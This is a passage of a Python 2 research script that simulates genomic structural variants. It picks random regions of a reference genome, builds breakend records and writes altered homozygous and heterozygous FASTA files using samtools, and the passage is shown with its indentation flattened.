ref_allele[a3]=[bp_hash[a3][0]]
for a4 in bp_hash[a3][1:]:
ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2a:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2a:
if k2a.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2a)>1:
for i in range(len(k2a)-1):
if not ord(k2a[i+1])>ord(k2a[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[0]:
if not a1 in k2a:
heta_Del_block.append(a1)
tra1[SV_ID]['a']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['a']=[]
t1=[]
for a3 in k2a:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
#print [k1,k2]
if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
flag1=0#flag1==0:w/o inversion in the alt structure
if '^' in k2b:
flag1+=1
flag2=0#flag2==0:w/o duplication in the alt structure
for j in k2b:
if k2b.count(j)>1:
flag2+=1
flag3=0 #flag3==0: w/o translocation
if len(k2b)>1:
for i in range(len(k2b)-1):
if not ord(k2b[i+1])>ord(k2b[i]):
flag3+=1
if flag1+flag2+flag3==0:
heta_Del_block=[]
for a1 in k1.split('/')[1]:
if not a1 in k2b:
heta_Del_block.append(a1)
tra1[SV_ID]['b']=[]
block_hash=[]
del_hash={}
block_rec=0
for a3 in a2[0]:
if a3 in chromos:
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
if not heta_Del_block==[]:
a_heta=0
heta_Del_new=[heta_Del_block[0]]
while True:
a_heta+=1
if a_heta==len(heta_Del_block):break
if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
heta_Del_new[-1]+=heta_Del_block[a_heta]
else:
heta_Del_new.append(heta_Del_block[a_heta])
for a3 in heta_Del_new:
a4=a3[0]
tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
a4=a3[-1]
tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
else:
tra1[SV_ID]['b']=[]
t1=[]
for a3 in k2b:
if not a3=='^':
t1.append(a3)
else:
t1[-1]+=a3
t2=[t1[0]]
for a3 in t1[1:]:
if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
t2[-1]+=a3
elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
t2[-1]+=a3
else:
t2.append(a3)
a3='left'
a4=t2[0]
l_chr=bp_hash[a3][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a4:
if not a4[0]==k1[0]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a4:
tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
for t3 in range(len(t2)-1):
a3=t2[t3]
a4=t2[t3+1]
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4[0]][0]
if not '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
elif '^' in a3 and not '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
elif not '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
elif '^' in a3 and '^' in a4:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
if len(t2)>1:
a3=t2[t3+1]
else:
a3=t2[0]
a4='right'
l_chr=bp_hash[a3[0]][0]
r_chr=bp_hash[a4][0]
if not '^' in a3:
if not a3[-1]==k1[-1]:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
if '^' in a3:
tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def sv_homo_initial():
sv_homo_info['DEL']=[]
sv_homo_info['DUP']=[]
sv_homo_info['INV']=[]
sv_homo_info['TRA']=[]
sv_homo_info['DUP_TANDEM']=[]
def produce_keys(key):
if key=='DEL':
ka='a/a'
kb='/'
elif key=='DUP_TANDEM':
ka='a/a'
dup_num=random.sample(range(2,20),1)
kb='/'.join([''.join(['a' for i in range(dup_num[0])]),''.join(['a' for i in range(dup_num[0])])])
elif key=='DUP':
ka='ab/ab'
kb='aba/aba'
elif key=='INV':
ka='a/a'
kb='a^/a^'
elif key=='TRA':
ka='ab/ab'
kb='ba/ba'
return [ka,kb]
def sv_homo_produce():
for k1 in SV_region:
sv_len=k1[2]-k1[1]
k2=k1[-1]
sv_homo_info[k2].append(k1+produce_keys(k2))
def sv_het_produce():
for k1 in sv_homo_info.keys():
sv_het_info[k1]=[]
for k2 in sv_homo_info[k1]:
allele=random.choice(range(2))
alle_poor=[k2[-2].split('/')[0],k2[-1].split('/')[0]]
k2[-1]='/'.join([alle_poor[allele],alle_poor[1-allele]])
sv_het_info[k1].append(k2)
def sv_rec_homo_produce():
for k1 in sv_homo_info.keys():
fo=open(dict_opts['--output-prefix']+'.homo.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.homo.'+k1+'.rec'
for k2 in sv_homo_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_rec_het_produce():
for k1 in sv_het_info.keys():
fo=open(dict_opts['--output-prefix']+'.het.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.het.'+k1+'.rec'
for k2 in sv_het_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_info_rewrite(sv_h_info):
for k1 in sv_h_info.keys():
for k2 in sv_h_info[k1]:
if not k2[-2] in sv_info.keys():
sv_info[k2[-2]]={}
if not k2[-1] in sv_info[k2[-2]].keys():
sv_info[k2[-2]][k2[-1]]=[]
sv_info[k2[-2]][k2[-1]].append([str(i) for i in k2[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
out=[]
for k1 in sv_hash[key]:
sv_min=int(k1[1])
sv_max=int(k1[2])
sv_int=(int(k1[2])-int(k1[1]))/3
out.append([k1[0],sv_min,sv_min+sv_int, sv_max-sv_int,sv_max])
return out
def sv_size_pick(sv_stat):
out=[]
for k1 in sv_stat:
out+=[random.choice(range(int(k1[1]),int(k1[2]))) for i in range(int(k1[0]/3))]
out+=[random.choice(range(int(k1[2]),int(k1[3]))) for i in range(int(int(k1[0])-int(k1[0]/3))/2)]
out+=[random.choice(range(int(k1[3]),int(k1[4]))) for i in range(int(k1[0])-int(k1[0]/3)-int(int(k1[0])-int(k1[0]/3))/2)]
permute=random.sample(out,len(out))
return out
def chromos_readin(refs):
fin=open(refs+'.fai')
chromos=[]
chromo_length=[]
genome_length=0
for line in fin:
pin=line.strip().split()
chromos.append(pin[0])
genome_length+=int(pin[1])
chromo_length.append(int(pin[1]))
fin.close()
chromo_num_region=[]
for k1 in chromo_length:
chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
chrom_to_remove=[]
out_num_region=[]
out_chromos=[]
out_length={}
for i in range(len(chromo_num_region)):
if chromo_num_region[i]>1:
out_chromos.append(chromos[i])
out_num_region.append(chromo_num_region[i])
out_length[chromos[i]]=chromo_length[i]
return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
for i in list_in:
if not i in sv_hash.keys():
sv_hash[i]=[key]
else:
sv_hash[i]+=[key]
def sv_region_pick():
#pick random regions across the genome
SV_region=[]
rec=-1
sv_size=del_size+dup_size+inv_size+tra_size+dup2_size
sv_size=random.sample(sv_size,len(sv_size))
for k1 in range(len(chromos)):
chromosome=chromos[k1]
num_region=chromo_num_region[k1]
range_region=chromo_length[chromosome]
temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
temp_end_region=[]
for k2 in range(num_region):
start=temp_start_region[k2]
start2=temp_start_region[k2+1]
if start2-start<1000: continue
rec+=1
temp_sv_size=sv_size[rec]
sv_type=sv_hash[sv_size[rec]][0]
del sv_hash[sv_size[rec]][0]
end=start+temp_sv_size
if not end<start2-300:
end=random.choice(range(start,int(numpy.mean([start,start2]))))
if sv_type=='TRA':
end2=random.choice(range(end+100,start2-100))
temp_end_region.append(end)
if sv_type=='TRA':
SV_region.append([chromos[k1],start,end,end2,sv_type])
else:
SV_region.append([chromos[k1],start,end,sv_type])
return SV_region
def ref_base_returnN(ref,chromo,pos):
return 'N'
def ref_base_readin(ref,chromo,pos):
fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
tre=fref.readline().strip().split()
REF_AL=fref.readline().strip().split()
if not REF_AL==[]:
return REF_AL[0]
else:
return 'N'
def del_flag_SA(k1,k2):
out=0
if not '^' in k2:
flagdup=0
for i in k2:
if k2.count(i)>1:
flagdup+=1
if flagdup==0:
flagtra=0
for i in range(len(k2)-1):
if ord(k2[i+1])-ord(k2[i])<1:
flagtra+=1
if flagtra==0:
if not k1==k2:
out=1
return out
def order_SV_Homo_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0]]])
def order_SV_Het_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0],k2.split('/')[1],k1.split('/')[0]]])
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
#Chromo=Chr, target chromosome
#BamN: DG187, DG196... name of sample
#eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
#Eg of flank: flank : 446
if letter_new=='':
return insert_read_decide(bp_list)
else:
bp_hash={}
bp_seq=[]
for k1 in bp_list:
if k1 in ChromoList:
bp_seq.append([k1])
else:
bp_seq[-1].append(k1)
rec=0
for k1 in bp_seq:
for k2 in range(len(k1)-2):
rec+=1
bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
letter_seq={}
for k1 in bp_hash.keys():
Chromo=bp_hash[k1][0]
region_left=bp_hash[k1][1]
region_right=bp_hash[k1][2]
seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
seq.readline().strip().split()
lines=[]
while True:
line=seq.readline().strip().split()
if not line: break
lines.append(line)
Seq1=lines[0][0]
for j in range(len(lines))[1:]:
Seq1=''.join([Seq1,lines[j][0]])
letter_seq[k1]=Seq1
letter_seq[k1+'^']=reverse(complementary(Seq1))
new_Seq=''
new_letter=[]
for k1 in letter_new:
if not k1=='^':
new_letter.append(k1)
else:
new_letter[-1]+=k1
for k1 in new_letter:
new_Seq+=letter_seq[k1]
new_Seq+=insert_read_decide(bp_list)
return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
start=int(bp_list[0])
end=int(bp_list[-1])
new1_ref=''
fin=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, start,end))
fin.readline().strip().split()
for line in fin:
pin=line.strip().split()
new1_ref+=pin[0]
fin.close()
return new1_ref
def reverse(seq):
seq2=[]
for i in seq[::-1]:
seq2.append(i)
return ''.join(seq2)
def complementary(seq):
seq2=[]
for i in seq:
if i in 'ATGCN':
seq2.append('ATGCN'['TACGN'.index(i)])
elif i in 'atgcn':
seq2.append('atgcn'['tacgn'.index(i)])
return ''.join(seq2)
def unit_produce(list):
temp1=[sorted(list)[0]]
for k1 in sorted(list)[1:]:
if ord(k1)-ord(temp1[-1][-1])==1:
temp1[-1]+=k1
else:
temp1.append(k1)
temp2=[]
for k1 in temp1:
for k2 in range(len(k1)+1)[1:]:
for k3 in range(len(k1)-k2+1):
temp2.append(k1[k3:(k3+k2)])
return temp2[::-1]
def fasta_homo_write(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_homo_write_test(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos[:1]:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_het_write(fasta_out):
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
print >>fo1, '>'+k1
print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
rec2_start=end
rec1_start+=1
rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo1, k1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for k1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[k1*60:(k1+1)*60])
new2_seq.append(new2_ref[(k1+1)*60:])
for k1 in new2_seq:
if not k1=='':
print >>fo2, k1
fo1.close()
fo2.close()
def Sample_info_ReadIn(Sam_File):
fi=open(Sam_File)
for line in fi:
pin=line.strip().split()
if not pin==[]:
if not pin[0] in sv_hash.keys():
sv_hash[pin[0]]=[]
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
else:
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
fi.close()
def write_axiom_pbs_header(fout,JobToDo):
fo=open(fout,'w')
print >>fo, '#!/bin/bash'
print >>fo, ' '
print >>fo, '#PBS -N '+JobToDo
print >>fo, '#PBS -l mem=4gb,walltime=100:0:0,nodes=compute-4-3'
print >>fo, '#PBS -m a'
print >>fo, '#PBS -M xuefzhao@umich.edu'
print >>fo, '#PBS -o '+JobToDo+'.log'
print >>fo, '#PBS -e '+JobToDo+'.err'
print >>fo, '#PBS -V'
print >>fo, '#PBS -d .'
fo.close()
def sv_total_num_calcu():
sv_total_num=0
for k1 in del_stat:
sv_total_num+=k1[0]
for k1 in dup_stat:
sv_total_num+=k1[0]
for k1 in dup2_stat:
sv_total_num+=k1[0]
for k1 in inv_stat:
sv_total_num+=k1[0]
for k1 in tra_stat:
sv_total_num+=k1[0]
return sv_total_num
def pick_random_seqs(ref,sv_total_num,chromo_length):
#12% of all SVs have micro insrts at both /either ends
#double number of seqs would be randomly picked from genome as long micro-insertions
num_micro_ins_over20bp=float(sv_total_num)*0.12*2
genome_length=0
chromos_num_regions={}
chrom_seqs={}
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
genome_length+=chromo_length[x]
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
for x in chromos_num_regions.keys():
chrom_seqs[x]=[]
int_num=int(round(chromos_num_regions[x]))
seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
for y in sorted(seq_pick):
length_pick=random.sample(range(20,50),1)[0]
seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
seqs.readline()
test=seqs.readline().strip()
if not 'NNNNNNNN' in test:
chrom_seqs[x].append(test)
seqs.close()
return chrom_seqs
def produce_random_seqs(length):
out=[]
for x in range(length):
out.append(random.choice(['A','T','G','C']))
return ''.join(out)
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
Sam_File=dict_opts['--input-sim']
sv_hash={}
Sample_info_ReadIn(Sam_File)
del_stat=sv_stat_calcu(sv_hash,'DEL')
dup_stat=sv_stat_calcu(sv_hash,'DUP_TANDEM')
dup2_stat=sv_stat_calcu(sv_hash,'DUP')
dup3_stat=[]
for i in dup2_stat:
dup3_stat.append([i[0]]+[j+1000 for j in i[1:]])
dup2_stat=dup3_stat
inv_stat=sv_stat_calcu(sv_hash,'INV')
tra_stat=sv_stat_calcu(sv_hash,'TRA')
del_size=sv_size_pick(del_stat)
dup_size=sv_size_pick(dup_stat)
dup2_size=sv_size_pick(dup2_stat)
inv_size=sv_size_pick(inv_stat)
tra_size=sv_size_pick(tra_stat)
sv_total_num=sv_total_num_calcu()
refs=dict_opts['--reference']
ref=refs
if not os.path.isfile(refs):
print 'Wrong reference genome !'
if not os.path.isfile(refs+'.fai'):
print 'reference genome not indexed !'
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
sv_hash={}
sv_hash_add(del_size,'DEL')
sv_hash_add(dup2_size,'DUP')
sv_hash_add(dup_size,'DUP_TANDEM')
sv_hash_add(inv_size,'INV')
sv_hash_add(tra_size,'TRA')
SV_region=sv_region_pick()
SV_region_filter=[]
for x in SV_region:
if x[-1]=='DUP' and x[2]-x[1]<1100: continue
else:
SV_region_filter.append(x)
SV_region=SV_region_filter
sv_homo_info={}
sv_homo_initial()
sv_homo_produce()
temp_dup=[]
for y in range(len(sv_homo_info['DUP'])):
x=sv_homo_info['DUP'][y]
if x[2]-x[1]<2000 and x[2]-x[1]>1100:
z=random.choice([x[1]+500,x[2]-500])
temp_dup.append(x[:2]+[z]+x[2:])
#sv_homo_info['DUP'][y]=x[:2]+[z]+x[2:]
elif x[2]-x[1]>1999:
z=random.choice(range(x[1]+800,x[1]+1200)+range(x[2]-1200,x[2]-800))
temp_dup.append(x[:2]+[z]+x[2:])
#sv_homo_info['DUP'][y]=x[:2]+[z]+x[2:]
elif x[2]-x[1]<1101:
continue
sv_homo_info['DUP']=temp_dup
#write homo sv rec
sv_rec_homo_produce()
sv_info={}
sv_info_rewrite(sv_homo_info)
dup1={}
inv1={}
del1={}
tra1={}
sv_rec_2(sv_info)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.homo.fa'
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Homo_write(sv_info)
fasta_homo_write(fasta_out)
os.system(r'''samtools faidx %s'''%(fasta_out))
elif function_name=='complex':
def bp_to_let(del_info_unit):
flag=0
for i in del_info_unit[0]:
if i in chromos or not i.isdigit():
flag+=1
if not flag==0:
letter=''.join([chr(i+97) for i in range(len(del_info_unit[0])-2*flag)])
letters='/'.join([letter,letter])
return letters
else:
return 0
def chromo_readin(ref):
fin=open(ref+'.fai')
out=[]
for line in fin:
pin=line.strip().split()
out.append(pin[0])
fin.close()
return out
def sv_sample_readin(path):
if not path[-1]=='/':
path+='/'
out={}
for k1 in os.listdir(path):
path1=path+k1+'/'
if os.path.isdir(path1):
for k2 in os.listdir(path1):
path2=path1+k2+'/'
for k3 in os.listdir(path2):
if k3.split('.')[-1]=='coverge':
fin=open(path2+k3)
while True:
